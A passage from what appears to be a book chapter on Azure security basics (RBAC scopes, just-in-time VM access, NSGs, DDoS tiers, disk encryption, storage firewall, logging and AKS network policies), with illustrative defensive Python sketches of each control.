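def _is_within(scope: str, resource_id: str) -> bool:
    """True if resource_id is the scope itself or nested below it (case-insensitive)."""
    scope = scope.rstrip("/").lower()
    rid = resource_id.rstrip("/").lower()
    return rid == scope or rid.startswith(scope + "/")


def effective_roles(assignments, principal: str, resource_id: str) -> list:
    """Collect every role the principal inherits on resource_id from any enclosing scope."""
    return sorted(
        {a.role for a in assignments
         if a.principal == principal and _is_within(a.scope, resource_id)}
    )


if __name__ == "__main__":
    assignments = [
        RoleAssignment("alice", "Reader", "/subscriptions/sub1"),
        RoleAssignment("alice", "Virtual Machine Contributor",
                       "/subscriptions/sub1/resourceGroups/web-rg"),
    ]
    vm = "/subscriptions/sub1/resourceGroups/web-rg/providers/Microsoft.Compute/virtualMachines/vm1"
    print(effective_roles(assignments, "alice", vm))
```

Here Alice can read everything in the subscription but can manage VMs only inside `web-rg`. Granting the narrower role at the resource group rather than at the subscription is the least-privilege pattern recommended above.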

Once a user is authenticated, they can manage resources in the Azure portal according to their level of authorization. The portal is a unified hub that simplifies building, deploying, and managing your cloud resources. The Azure portal also calculates existing charges and forecasts the customer’s monthly charges, regardless of the number of resources across apps.

A subscription can include zero or more hosted services and zero or more storage accounts. From the Azure portal (or by using PowerShell, the Azure CLI, or ARM templates), you can provision new hosted services, such as a new virtual machine (VM). These VMs use compute and storage resources allocated from Azure. They can work in silos within the Azure infrastructure, or they can be publicly available on the Internet. You can securely publish resources that are available in your VM, such as a web server, and harden access to these resources by using access control lists (ACLs). You can also isolate VMs in the cloud by creating different virtual networks (VNets) and controlling traffic between them by using network security groups (NSGs).

VM protection

When you think about protecting VMs in Azure, you must think holistically. That is, not only must you think about leveraging built-in Azure resources to protect the VM, you must also think about protecting the operating system itself. For example, you should implement security best practices and update management to keep the VMs up to date. You should also monitor access to these VMs. Some key VM operations include the following:

Configuring monitoring and exporting events for analysis

Configuring Microsoft antimalware or an AV/AM solution from a partner

Applying a corporate firewall using site-to-site VPN and configuring endpoints

Defining access controls between tiers and providing additional protection via the OS firewall

Monitoring and responding to alerts

Installing a vulnerability assessment tool to have visibility beyond the operating system’s vulnerabilities

Important

For more details about Compute security, see https://docs.microsoft.com/en-us/azure/security/security-virtual-machines-overview.

Reducing network exposure is also a recommended practice for VM hardening. For example, if you don’t need constant Internet access to your VM via Remote Desktop Protocol (RDP), why leave the port open? One solution to this problem is just-in-time (JIT) VM access, available in Defender for Servers. You can use Azure Policy to create enforcement standards for VM deployment based on your organization’s needs. You can also use custom images that are already hardened according to specific standards, so that new VMs are secure from the moment they are deployed. In Azure Marketplace, you will find hardened images based on the Center for Internet Security (CIS) benchmarks (see https://www.cisecurity.org/cis-benchmarks).
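The core idea behind just-in-time VM access is that a management port such as RDP (3389) stays closed by default and is opened only for an approved source IP address for a limited time. The Python sketch below models that behavior. It is a hypothetical illustration of the concept, not the Defender for Servers implementation or API; the `JitPolicy` class and the 3-hour maximum window are assumptions chosen for the example.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone


@dataclass
class JitPolicy:
    """Hypothetical model of a JIT rule for one management port."""
    port: int
    max_duration: timedelta
    grants: list = field(default_factory=list)  # (source_ip, expires_at) tuples

    def request_access(self, source_ip: str, duration: timedelta, now: datetime) -> datetime:
        """Open the port for source_ip, capping the window at max_duration."""
        expires_at = now + min(duration, self.max_duration)
        self.grants.append((source_ip, expires_at))
        return expires_at

    def is_allowed(self, source_ip: str, port: int, now: datetime) -> bool:
        """Deny by default; allow only an unexpired grant for this IP and port."""
        if port != self.port:
            return False
        return any(ip == source_ip and now < expires for ip, expires in self.grants)


if __name__ == "__main__":
    t0 = datetime(2022, 3, 1, 9, 0, tzinfo=timezone.utc)
    rdp = JitPolicy(port=3389, max_duration=timedelta(hours=3))
    print(rdp.is_allowed("203.0.113.7", 3389, t0))  # False: closed by default
    rdp.request_access("203.0.113.7", timedelta(hours=8), t0)
    print(rdp.is_allowed("203.0.113.7", 3389, t0 + timedelta(hours=1)))  # True
    print(rdp.is_allowed("203.0.113.7", 3389, t0 + timedelta(hours=4)))  # False: expired
```

Capping the requested 8 hours at the policy maximum is the design point: even an approved request cannot leave the port exposed longer than the organization allows.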

By deploying new VMs from these predefined CIS images, you ensure that your VMs are always hardened based on industry standards. While this is good practice, some organizations might want to go even further and customize their own images, which is also a feasible alternative. When planning your custom image, remember that hardening is more than disabling services; it’s also about applying security configurations to your operating system and applications.

Endpoint protection is also an imperative part of your security strategy, and these days you can’t have endpoint protection without an antimalware solution installed on your VM. In Azure, you have the native Azure Antimalware component that you can deploy to all VMs by leveraging Microsoft Defender for Cloud.

Network protection

Azure virtual networks are very similar to the virtual networks you use on-premises with your own virtualization platform solutions. To help you understand this, Figure 1-7 illustrates a typical Azure Network infrastructure.

In Figure 1-7, you can see the Azure infrastructure (on top) with three virtual networks. Contoso needs to segment its Azure network into different virtual networks (VNets) to provide better isolation and security. Having VNets in its Azure infrastructure allows Contoso’s Azure virtual machines (VMs) to communicate securely with each other, the Internet, and Contoso’s on-premises networks.

FIGURE 1-7 Contoso network infrastructure

If you think about a traditional physical network on-premises, where you operate your own datacenter, that’s basically what a VNet is, but with the additional benefits of Azure’s infrastructure, including scalability, availability, and isolation. When you create a VNet, you must specify a custom private IP address space that will be used by the resources that belong to this VNet. For example, if you deploy a VM in a VNet with an address space of 10.0.0.0/24, the VM will be assigned a private IP address from that range, such as 10.0.0.10.
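Python's standard `ipaddress` module is a convenient way to reason about VNet address spaces. The sketch below checks that an address falls inside the 10.0.0.0/24 range from the example and counts the addresses actually available to resources, assuming a single subnet that spans the whole space. It relies on Azure's documented behavior of reserving five addresses in every subnet (the first four and the last); the helper names are hypothetical.

```python
import ipaddress

# Network address, default gateway, two Azure DNS addresses, and the last address
AZURE_RESERVED_PER_SUBNET = 5


def subnet_summary(cidr: str) -> dict:
    """Summarize the address range Azure can hand out to resources in one subnet."""
    net = ipaddress.ip_network(cidr)
    return {
        "total": net.num_addresses,
        "usable": net.num_addresses - AZURE_RESERVED_PER_SUBNET,
        "first_usable": str(net.network_address + 4),   # .0 through .3 are reserved
        "last_usable": str(net.broadcast_address - 1),  # the last address is reserved
    }


def in_address_space(ip: str, cidr: str) -> bool:
    """True if ip belongs to the given address space."""
    return ipaddress.ip_address(ip) in ipaddress.ip_network(cidr)


if __name__ == "__main__":
    print(subnet_summary("10.0.0.0/24"))
    print(in_address_space("10.0.0.10", "10.0.0.0/24"))
```

For 10.0.0.0/24 this reports 251 usable addresses, from 10.0.0.4 through 10.0.0.254, and confirms that 10.0.0.10 belongs to the range.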

Network access control is as important on Azure virtual networks as it is on-premises, and the principle of least privilege applies both on-premises and in the cloud. One way to enforce network access controls in Azure is to use network security groups (NSGs). An NSG is equivalent to a simple stateful packet-filtering firewall or router, similar to the type of firewalling done in the 1990s. (We don’t say this to be negative about NSGs; instead, we want to clarify that some techniques for network access control have survived the test of time.)

Important

For more details about Azure network security, see https://docs.microsoft.com/en-us/azure/security/security-network-overview.

Network segmentation is important in many scenarios, and you need to understand the design requirements to suggest the implementation options. Let’s say you want to ensure that hosts on the Internet cannot communicate with hosts on a back-end subnet but can communicate with hosts on the front-end subnet. In this case, you should create two VNets—one for your front-end resources and another for your back-end resources.

NSG security rules are evaluated by priority. Each rule is assigned a priority number between 100 and 4,096, and lower numbers are processed first; once traffic matches a rule, processing stops. The security rules use 5-tuple information (source address, source port, destination address, destination port, and protocol) to allow or deny the traffic. When traffic is evaluated, a flow record is created for existing connections, and communication is allowed or denied based on the connection state of the flow record. You can compare this type of configuration to the VLAN segmentation that was often implemented in on-premises networks.
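The priority-ordered, first-match evaluation of NSG rules can be sketched in a few lines of Python. This is a deliberately simplified model: it evaluates a single direction, matches exact ports only (no ranges or service tags), ignores the stateful flow records, and uses a final catch-all deny as a stand-in for the NSG default rules. The `Rule` class and `evaluate` function are hypothetical and are not an Azure SDK API.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    """Hypothetical, simplified NSG rule built on the 5-tuple."""
    name: str
    priority: int          # 100-4096; lower numbers are processed first
    source: str            # CIDR prefix or "*"
    source_port: str       # single port as a string, or "*"
    destination: str       # CIDR prefix or "*"
    destination_port: str  # single port as a string, or "*"
    protocol: str          # "TCP", "UDP", or "*"
    access: str            # "Allow" or "Deny"

    def __post_init__(self):
        if not 100 <= self.priority <= 4096:
            raise ValueError(f"{self.name}: priority must be between 100 and 4096")


def _addr_matches(pattern: str, addr: str) -> bool:
    return pattern == "*" or ipaddress.ip_address(addr) in ipaddress.ip_network(pattern)


def _value_matches(pattern: str, value) -> bool:
    return pattern == "*" or pattern.upper() == str(value).upper()


def evaluate(rules, src, src_port, dst, dst_port, protocol):
    """Return (access, rule_name) for the first matching rule in priority order."""
    for rule in sorted(rules, key=lambda r: r.priority):
        if (_addr_matches(rule.source, src)
                and _value_matches(rule.source_port, src_port)
                and _addr_matches(rule.destination, dst)
                and _value_matches(rule.destination_port, dst_port)
                and _value_matches(rule.protocol, protocol)):
            return rule.access, rule.name  # processing stops at the first match
    return "Deny", "catch-all-deny"  # simplified stand-in for the default rules


if __name__ == "__main__":
    rules = [
        Rule("allow-rdp", 400, "*", "*", "10.0.1.0/24", "3389", "TCP", "Allow"),
        Rule("allow-https", 200, "*", "*", "10.0.1.0/24", "443", "TCP", "Allow"),
        Rule("deny-all-to-web", 300, "*", "*", "10.0.1.0/24", "*", "*", "Deny"),
    ]
    print(evaluate(rules, "203.0.113.7", 50000, "10.0.1.4", 443, "TCP"))   # ('Allow', 'allow-https')
    print(evaluate(rules, "203.0.113.7", 50000, "10.0.1.4", 3389, "TCP"))  # ('Deny', 'deny-all-to-web')
```

The second result shows why priority planning matters: `allow-rdp` at priority 400 never takes effect, because the broader deny at 300 is evaluated first.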

When configuring your virtual network, also consider that the resources you deploy within the virtual network inherit the ability to communicate with each other. You can also connect virtual networks to each other by using virtual network peering, which enables resources in either virtual network to communicate with each other. The peered VNets can be in the same Azure region or in different regions.
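One practical check before peering two virtual networks is that their address spaces must not overlap, because Azure does not allow peering between VNets with overlapping address ranges. The Python sketch below performs that check with the standard `ipaddress` module; the function names and example prefixes are hypothetical.

```python
import ipaddress
from itertools import product


def overlapping_prefixes(vnet_a: list, vnet_b: list) -> list:
    """Return every (prefix_a, prefix_b) pair whose ranges overlap."""
    return [
        (a, b)
        for a, b in product(vnet_a, vnet_b)
        if ipaddress.ip_network(a).overlaps(ipaddress.ip_network(b))
    ]


def can_peer(vnet_a: list, vnet_b: list) -> bool:
    """Peering is only possible when no address prefixes overlap."""
    return not overlapping_prefixes(vnet_a, vnet_b)


if __name__ == "__main__":
    hub = ["10.0.0.0/16"]
    spoke_ok = ["10.1.0.0/16"]
    spoke_bad = ["10.0.128.0/24", "192.168.0.0/24"]
    print(can_peer(hub, spoke_ok))               # True
    print(overlapping_prefixes(hub, spoke_bad))  # [('10.0.0.0/16', '10.0.128.0/24')]
```

Planning non-overlapping address spaces up front avoids having to re-address a VNet later just to peer it.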

Azure DDoS protection

Azure can provide the scale and expertise to protect against large and sophisticated DDoS (distributed denial-of-service) attacks. However, under the shared responsibility model used in cloud computing, customers must also design their applications to handle a massive amount of traffic. Key capabilities for applications include high availability, scale-out, resiliency, fault tolerance, and attack surface reduction. Azure DDoS protection is part of the defense-in-depth approach used by Azure networks, as shown in Figure 1-8.

FIGURE 1-8 Azure network defense in-depth approach



By default, Azure provides continuous protection against DDoS attacks through DDoS Protection Basic, at no charge. However, if you want DDoS protection metrics, alerts, mitigation reports, mitigation flow logs, policy customization, and support, you need Azure DDoS Protection Standard. You can enable Azure DDoS Protection Standard on a virtual network by using the Azure portal or PowerShell. If Azure DDoS Protection Standard is not enabled on your subscription, Microsoft Defender for Cloud triggers a recommendation like the one shown in Figure 1-9.

FIGURE 1-9 Microsoft Defender for Cloud recommendation to enable Azure DDoS Standard

Important

For more details about Azure DDoS Protection, see http://aka.ms/ddosprotectiondocs.

While the Basic tier provides automatic attack mitigation, some capabilities are provided only by the Standard tier, and your organization’s requirements will determine which tier to use. For example, suppose your organization needs DDoS protection at the application level, real-time attack metrics and resource logs available to its team, and post-attack mitigation reports to present to upper management. Only the DDoS Standard tier fulfills these requirements. Table 1-1 summarizes the capabilities available in each tier.

TABLE 1-1 Azure DDoS Basic versus Standard

| Capability | DDoS Basic | DDoS Standard |
|---|---|---|
| Active traffic monitoring and always-on detection | X | X |
| Automatic attack mitigation | X | X |
| Availability guarantee | Per Azure region | Per application |
| Mitigation policies | Tuned per Azure region volume | Tuned for application traffic volume |
| Metrics and alerts | Not available | X |
| Mitigation flow logs | Not available | X |
| Mitigation policy customization | Not available | X |
| Support | Best effort (no guarantee that support will address the issue) | Access to DDoS experts during an active attack |
| SLA | Azure region | Application guarantee and cost protection |
| Pricing | Free | Monthly usage |
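Table 1-1 can be turned into a simple decision aid: if any requirement appears only in the Standard column, the organization needs the Standard tier. The Python sketch below encodes that rule. The requirement labels are hypothetical shorthand for the rows in the table (plus mitigation reports, which the text lists as a Standard capability), not Azure setting names.

```python
# Capabilities that Table 1-1 marks as Standard-only
STANDARD_ONLY = {
    "metrics and alerts",
    "mitigation reports",
    "mitigation flow logs",
    "mitigation policy customization",
    "ddos expert support during an attack",
    "per-application availability guarantee",
    "cost protection",
}
# Capabilities available in both tiers
BOTH_TIERS = {
    "active traffic monitoring",
    "automatic attack mitigation",
}


def required_ddos_tier(requirements) -> str:
    """Return "Standard" if any requirement is Standard-only, otherwise "Basic"."""
    reqs = {r.lower() for r in requirements}
    unknown = reqs - STANDARD_ONLY - BOTH_TIERS
    if unknown:
        raise ValueError(f"unrecognized requirements: {sorted(unknown)}")
    return "Standard" if reqs & STANDARD_ONLY else "Basic"


if __name__ == "__main__":
    print(required_ddos_tier({"automatic attack mitigation"}))
    print(required_ddos_tier({"automatic attack mitigation", "metrics and alerts", "mitigation reports"}))
```

The first call returns `Basic` and the second returns `Standard`, matching the example scenario where management expects metrics and post-attack reports.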

Storage protection

Data encryption at rest is an extremely important part of your overall VM security strategy. Defender for Cloud will even trigger a security recommendation when a VM is missing disk encryption. You can encrypt your Windows and Linux virtual machines’ disks using Azure Disk Encryption (ADE). For Windows OS, you need Windows 8 or later (for client) and Windows Server 2008 R2 or later (for servers).

ADE provides operating system and data disk encryption. For Windows, it uses BitLocker; for Linux, it uses DM-Crypt. ADE is not available in the following scenarios:

Basic A-series VMs

VMs with less than 2 GB of memory

Generation 2 VMs and Lsv2-series VMs

Unmounted volumes
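Before planning an ADE rollout, it can help to screen VMs against the unsupported scenarios listed above. The Python sketch below does that for a hypothetical `VmProfile` record. The field names and the size-name patterns (Azure size names such as `Basic_A1` and `Standard_L8s_v2`) are assumptions for illustration, and the checks mirror only the list in this section.

```python
from dataclasses import dataclass


@dataclass
class VmProfile:
    """Hypothetical summary of the VM properties relevant to ADE support."""
    size: str              # Azure size name, e.g. "Standard_D2s_v3"
    memory_gb: float
    generation: int        # 1 or 2
    unmounted_volumes: int = 0


def ade_blockers(vm: VmProfile) -> list:
    """List the reasons, from the unsupported scenarios above, that ADE cannot fully apply."""
    blockers = []
    if vm.size.startswith("Basic_A"):
        blockers.append("Basic A-series VM")
    if vm.memory_gb < 2:
        blockers.append("less than 2 GB of memory")
    if vm.generation == 2:
        blockers.append("Generation 2 VM")
    if vm.size.startswith("Standard_L") and vm.size.endswith("s_v2"):
        blockers.append("Lsv2-series VM")
    if vm.unmounted_volumes:
        blockers.append(f"{vm.unmounted_volumes} unmounted volume(s) will not be encrypted")
    return blockers


if __name__ == "__main__":
    print(ade_blockers(VmProfile("Standard_D2s_v3", 8, 1)))  # []
    print(ade_blockers(VmProfile("Basic_A1", 1.75, 1)))
```

An empty list means none of the listed scenarios apply; the second VM is flagged both for its Basic A-series size and for having less than 2 GB of memory.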

ADE requires that your Windows VM have connectivity to Azure AD to obtain a token for connecting to Key Vault. The VM then needs access to the Key Vault endpoint to write the encryption keys, and it also needs access to an Azure Storage endpoint. This storage endpoint hosts the Azure extension repository and the Azure Storage account that holds the VHD files.

Group Policy is another important consideration when implementing ADE. If the VMs for which you are implementing ADE are domain joined, make sure not to push any Group Policy that enforces Trusted Platform Module (TPM) protectors. If you want to use BitLocker on a computer without a TPM, you need to ensure that the Allow BitLocker Without A Compatible TPM policy is configured. Also, the BitLocker policy for domain-joined VMs with a custom Group Policy must include the Configure user storage of BitLocker recovery information -> Allow 256-bit recovery key setting.

Because ADE uses Azure Key Vault to control and manage disk encryption keys and secrets, you need to ensure that Azure Key Vault is configured properly for this implementation. One important consideration is that the VM and the key vault must be in the same subscription. Also, make sure that encryption secrets do not cross regional boundaries; ADE requires the key vault and the VMs to be co-located in the same region.
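The two co-location requirements can be checked from Azure resource IDs, which always start with `/subscriptions/<subscription-id>/`. The Python sketch below extracts the subscription from each ID and compares regions. The function names are hypothetical, and the sketch assumes you already have each resource's region as a display name or short name (for example, "East US" or "eastus").

```python
def subscription_of(resource_id: str) -> str:
    """Extract the subscription ID from an Azure resource ID."""
    parts = resource_id.strip("/").split("/")
    # Expected form: subscriptions/<id>/resourceGroups/<rg>/providers/...
    if len(parts) < 2 or parts[0].lower() != "subscriptions":
        raise ValueError(f"not an Azure resource ID: {resource_id}")
    return parts[1].lower()


def _normalize_region(region: str) -> str:
    # Treat "East US" and "eastus" as the same region
    return region.replace(" ", "").lower()


def ade_key_vault_issues(vm_id: str, vm_region: str, vault_id: str, vault_region: str) -> list:
    """Report violations of the same-subscription and same-region requirements."""
    issues = []
    if subscription_of(vm_id) != subscription_of(vault_id):
        issues.append("VM and key vault are in different subscriptions")
    if _normalize_region(vm_region) != _normalize_region(vault_region):
        issues.append("VM and key vault are in different regions")
    return issues


if __name__ == "__main__":
    vm = "/subscriptions/sub1/resourceGroups/app-rg/providers/Microsoft.Compute/virtualMachines/vm1"
    kv = "/subscriptions/sub1/resourceGroups/sec-rg/providers/Microsoft.KeyVault/vaults/ade-kv"
    print(ade_key_vault_issues(vm, "East US", kv, "eastus"))     # []
    print(ade_key_vault_issues(vm, "East US", kv, "West Europe"))
```

The second call reports a region mismatch, which would mean the encryption secrets cross a regional boundary.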

Important

For more details about Azure Storage security, see https://docs.microsoft.com/en-us/azure/security/security-storage-overview.

Another layer of protection that you can add to Azure Storage is the storage firewall. When you enable this feature, you can better control the level of access to your storage accounts based on the type and subset of networks used. When network rules are configured, only applications that request data over the specified set of networks can access the storage account.

You can create granular controls to limit access to your storage account to requests from specific IP addresses, IP ranges, or a list of subnets in an Azure VNet. The firewall rules created on your Azure Storage are enforced on all network protocols that can be used to access your storage account, including REST and SMB.

Because a storage account’s default configuration allows connections from clients on any network (including the Internet), it is recommended that you configure this feature to limit access to selected networks.
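The following Python sketch models how storage firewall rules decide whether a request is accepted: while the default action is Allow (the default configuration), every network gets in; once it is set to Deny, only listed IP addresses, IP ranges, or VNet subnets are admitted. The class is hypothetical. Its fields only loosely mirror the `defaultAction`, `ipRules`, and `virtualNetworkRules` properties of a storage account's network rule set, and real evaluation of subnet traffic also depends on service endpoints, which the sketch ignores.

```python
import ipaddress
from dataclasses import dataclass, field


@dataclass
class StorageNetworkRules:
    """Hypothetical, simplified model of a storage account's network rules."""
    default_action: str = "Allow"                     # default: accept every network
    ip_rules: list = field(default_factory=list)      # single public IPs or CIDR ranges
    subnet_rules: list = field(default_factory=list)  # VNet subnet resource IDs

    def is_allowed(self, source_ip=None, subnet_id=None) -> bool:
        """Decide access; the result does not depend on protocol (REST or SMB)."""
        if self.default_action == "Allow":
            return True
        if source_ip is not None:
            ip = ipaddress.ip_address(source_ip)
            if any(ip in ipaddress.ip_network(rule) for rule in self.ip_rules):
                return True
        if subnet_id is not None:
            allowed = {s.lower() for s in self.subnet_rules}
            if subnet_id.lower() in allowed:
                return True
        return False


if __name__ == "__main__":
    app_subnet = ("/subscriptions/sub1/resourceGroups/app-rg/providers"
                  "/Microsoft.Network/virtualNetworks/vnet1/subnets/app")
    locked = StorageNetworkRules("Deny", ["203.0.113.0/24"], [app_subnet])
    print(StorageNetworkRules().is_allowed(source_ip="198.51.100.1"))  # True: default is open
    print(locked.is_allowed(source_ip="203.0.113.50"))                # True: listed range
    print(locked.is_allowed(source_ip="198.51.100.1"))                # False
    print(locked.is_allowed(subnet_id=app_subnet))                     # True: listed subnet
```

The first line of output illustrates the recommendation above: with the default configuration, an arbitrary Internet address is accepted.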

Defender for Storage

When you enable Defender for Storage, you are notified through alerts when anomalous access or data exfiltration activities occur. These alerts include detections such as the following:

Access made from an unusual location

Unusual data extraction

Unusual anonymous access

Unexpected deletions

Access permission changes

Uploading the Azure Cloud Service package

You can enable this capability at the storage account level, or you can simply enable it at the subscription level in the Defender for Cloud pricing settings. This capability is covered in more detail in Chapter 6, “Threat detection.”

Identity

Azure AD Identity Protection is a feature of Azure Active Directory (Azure AD). It is widely used because it can detect potential identity-related vulnerabilities and suspicious actions related to your users’ identities, and because it provides the ability to investigate incidents. Azure AD Identity Protection alerts are also streamed to Defender for Cloud.

Important

For more details about Azure AD Identity Protection, see http://aka.ms/AzureADIdentityProtection.

Logging

Over the years, it has become increasingly important to always have logs available to investigate security-related issues. Azure provides different types of logs, and understanding how they differ can help during an investigation. Data plane logs reflect events raised as part of using an Azure resource, such as writing a file to a storage account. Control plane logs reflect events raised by Azure Resource Manager, such as the creation of a storage account.
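The control plane and data plane split is also visible in the endpoints that requests are sent to. In the global Azure cloud, control plane operations go through Azure Resource Manager at `management.azure.com`, whereas data plane operations go to the resource's own endpoint (for example, a storage account's blob endpoint). The Python sketch below classifies a request URL on that basis. It is a simplification that ignores sovereign clouds and other special endpoints; the function name, account name, and `api-version` value are hypothetical.

```python
from urllib.parse import urlparse

# Azure Resource Manager endpoint for the global Azure cloud
CONTROL_PLANE_HOSTS = {"management.azure.com"}


def plane_of(request_url: str) -> str:
    """Classify a request as 'control' (Resource Manager) or 'data' (resource endpoint)."""
    host = (urlparse(request_url).hostname or "").lower()
    return "control" if host in CONTROL_PLANE_HOSTS else "data"


if __name__ == "__main__":
    create = ("https://management.azure.com/subscriptions/sub1/resourceGroups/rg1"
              "/providers/Microsoft.Storage/storageAccounts/contosodata?api-version=2021-09-01")
    write = "https://contosodata.blob.core.windows.net/reports/q1.csv"
    print(plane_of(create))  # control: creating the account is recorded in Activity Log
    print(plane_of(write))   # data: writing a blob appears in resource logs, if enabled
```

Knowing which plane an action belongs to tells you whether to start an investigation in Activity Log or in the resource's own logs.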

Those logs can be extracted from different services in Azure because Azure provides different layers of logging capability. Figure 1-10 shows the different logging tiers.

FIGURE 1-10 Different tiers of logging in Azure

Understanding this tier model helps you decide which areas to focus on when extracting logs. For example, to extract VM activities (provisioning, deprovisioning, and so on), you need to look at logs at the Azure Resource Manager level. To view activity logs about operations on a resource from the control plane perspective, use Azure Activity Log, which sits in the Azure Tenant layer in the diagram. Diagnostics Logs are located in the Azure Resources layer and are emitted by the resource itself. They provide information about the operation of that resource (the data plane).

Because this book focuses on Microsoft Defender for Cloud, it is important to highlight a scenario that comes up often: the need to see which actions were performed in the Microsoft Defender for Cloud configuration. Let’s use a very simple example. Say you notice that only one email address is configured as a security contact, instead of the three that were configured before. You can use Azure Activity Log to investigate when this change occurred. In this case, you should see an entry similar to the one shown in Figure 1-11.

FIGURE 1-11 Azure Activity Log

If you select the successful Delete Security Contact entry, you can view its JSON content, which shows who performed this action and when it was done.
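When Activity Log entries are exported as JSON, you can filter them programmatically instead of browsing the portal. The Python sketch below looks for successful operations with a given name and returns when they happened and who performed them. It assumes the exported events use the `operationName`, `status`, `caller`, and `eventTimestamp` fields of the Activity Log event schema, and that deleting a security contact is recorded as `Microsoft.Security/securityContacts/delete`; the sample events are invented for illustration.

```python
import json

# Invented sample of exported Activity Log events (only the fields used below)
SAMPLE_EVENTS = json.loads("""
[
  {"operationName": {"value": "Microsoft.Security/securityContacts/delete"},
   "status": {"value": "Started"},
   "caller": "admin@contoso.com", "eventTimestamp": "2022-03-01T10:14:58Z"},
  {"operationName": {"value": "Microsoft.Security/securityContacts/delete"},
   "status": {"value": "Succeeded"},
   "caller": "admin@contoso.com", "eventTimestamp": "2022-03-01T10:15:02Z"},
  {"operationName": {"value": "Microsoft.Storage/storageAccounts/write"},
   "status": {"value": "Succeeded"},
   "caller": "dev@contoso.com", "eventTimestamp": "2022-03-02T08:00:00Z"}
]
""")


def who_did_what(events, operation: str) -> list:
    """Return (timestamp, caller) for each successful event with the given operation name."""
    return sorted(
        (e["eventTimestamp"], e["caller"])
        for e in events
        if e["operationName"]["value"].lower() == operation.lower()
        and e["status"]["value"] == "Succeeded"
    )


if __name__ == "__main__":
    print(who_did_what(SAMPLE_EVENTS, "Microsoft.Security/securityContacts/delete"))
```

Filtering on the `Succeeded` status skips the matching `Started` event, so each completed deletion is reported once, with its caller and timestamp.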

Container security

The utilization of containers is growing substantially in different industries, which makes containers a target for potential attacks. Because a container is a lightweight, standalone, and executable package that includes everything needed to run an application, the threat vectors are very diverse. To avoid exposure, it is critical that containers are deployed in the most secure manner.

Containers in Azure use the same network stack as the regular Azure VMs; the difference is that in the container environment, you also have the concept of the Azure Virtual Network container network interface (CNI) plug-in. This plug-in is responsible for assigning an IP address from a virtual network to containers brought up in the VM, attaching them to the VNet, and connecting them directly to other containers.

One important concept in containers is called a pod. A pod represents a single instance of your application and typically has a 1:1 mapping with a container, although in some scenarios a pod may contain multiple containers. Figure 1-12 shows an example of an Azure networking topology that uses containers.

FIGURE 1-12 Container network in Azure

Notice that a virtual network IP address is assigned to every pod (which could consist of one or more containers). These pods can connect to peered virtual networks and to on-premises networks over ExpressRoute or a site-to-site VPN. You can also configure a virtual network service endpoint to connect these pods to services such as Azure Storage and Azure SQL Database. In the example shown in Figure 1-12, an NSG was assigned to the container, but it can also be applied directly to the pod. If you need to expose your pod to the Internet, you can assign a public IP address directly to it.

Following the defense-in-depth approach, you should maintain network segmentation (nano-segmentation) or segregation between containers. Network segmentation might also be required when using containers in industries that must meet compliance mandates.

Azure Kubernetes Service (AKS) network

AKS nodes are connected to a virtual network and can provide inbound and outbound connectivity for pods using the kube-proxy component, which runs on each node to provide these network features.

AKS can be deployed in two network models: kubenet networking (default option), where the network resources are usually created and configured during the AKS cluster deployment, and Azure CNI, where the AKS cluster connects to an existing VNet.
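Because Azure CNI gives every pod an IP address from the VNet, subnet sizing matters when you choose that model. The Python sketch below applies the sizing rule that the AKS documentation has given for Azure CNI, (nodes + 1) + ((nodes + 1) × maximum pods per node), where the extra node accounts for upgrade operations, and then finds the smallest subnet prefix that fits after Azure's five reserved addresses per subnet. Treat it as a planning aid under those assumptions; the function names are hypothetical.

```python
def azure_cni_ips_needed(nodes: int, max_pods_per_node: int) -> int:
    """Node IPs plus pod IPs, with one extra node's worth reserved for upgrades."""
    return (nodes + 1) + (nodes + 1) * max_pods_per_node


def smallest_subnet_prefix(ip_count: int) -> int:
    """Smallest IPv4 subnet (largest prefix length) whose usable addresses cover ip_count."""
    for prefix in range(29, 7, -1):  # /29 is the smallest subnet Azure allows
        if 2 ** (32 - prefix) - 5 >= ip_count:  # Azure reserves 5 addresses per subnet
            return prefix
    raise ValueError("address requirement too large for a single subnet")


if __name__ == "__main__":
    needed = azure_cni_ips_needed(nodes=50, max_pods_per_node=30)
    print(needed, f"/{smallest_subnet_prefix(needed)}")  # 1581 /21
```

A /22 offers only 1,019 usable addresses, so a 50-node cluster with 30 pods per node needs at least a /21. With kubenet, pods draw from a separate address range instead, so the VNet subnet only needs to cover the nodes.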

You can use NSGs to filter traffic for AKS nodes. When you create a Service, such as one of type LoadBalancer, the Azure platform automatically configures any needed NSG rules. Do not manually configure NSG rules to filter traffic for pods in an AKS cluster; instead, define the required ports and forwarding as part of your Kubernetes Service manifests, and let the Azure platform create or update the appropriate rules. Another option is to use network policies to apply traffic filter rules to pods automatically. Network policy is a Kubernetes capability available in AKS that allows you to control the traffic flow between pods.

Network policies use different attributes to determine how to allow or deny traffic. These attributes are based on settings such as assigned labels, namespace, or traffic port. Keep in mind that NSGs are suitable for AKS nodes, not pods. Network policies are more suitable for pods because pods are dynamically created in an AKS cluster. In this case, you can configure the required network policies to be automatically applied.
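As an example of a label-based rule, the Python sketch below builds a standard Kubernetes `NetworkPolicy` manifest (API group `networking.k8s.io/v1`) that lets only pods labeled `app: frontend` reach pods labeled `app: backend` on TCP port 8080, within one namespace. The policy name, namespace, labels, and port are hypothetical. Generating the manifest in code is just one option; the same document is usually written directly in YAML.

```python
import json


def allow_ingress_from_labels(name, namespace, target_labels, allowed_labels, port, protocol="TCP"):
    """Build a NetworkPolicy that admits traffic to target pods only from allowed pods on one port."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": name, "namespace": namespace},
        "spec": {
            # Pods this policy applies to, selected by label
            "podSelector": {"matchLabels": target_labels},
            # Selected pods reject any ingress not allowed by the rules below
            "policyTypes": ["Ingress"],
            "ingress": [{
                # Without a namespaceSelector, this matches pods in the same namespace
                "from": [{"podSelector": {"matchLabels": allowed_labels}}],
                "ports": [{"protocol": protocol, "port": port}],
            }],
        },
    }


if __name__ == "__main__":
    policy = allow_ingress_from_labels(
        "backend-allow-frontend", "shop", {"app": "backend"}, {"app": "frontend"}, 8080)
    print(json.dumps(policy, indent=2))
```

Because `kubectl` accepts JSON as well as YAML, the output can be saved to a file and applied with `kubectl apply -f`. In AKS, network policies are enforced only if the cluster was created with a network policy option (Azure or Calico).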

There are two main types of isolation for AKS clusters: logical and physical. You should use logical isolation to separate teams and projects. A single AKS cluster can be used for multiple workloads, teams, or environments when you use logical isolation.

It is also recommended that you minimize the number of physical AKS clusters you deploy to isolate teams or applications. Figure 1-13 shows an example of this logical isolation.

FIGURE 1-13 AKS logical isolation

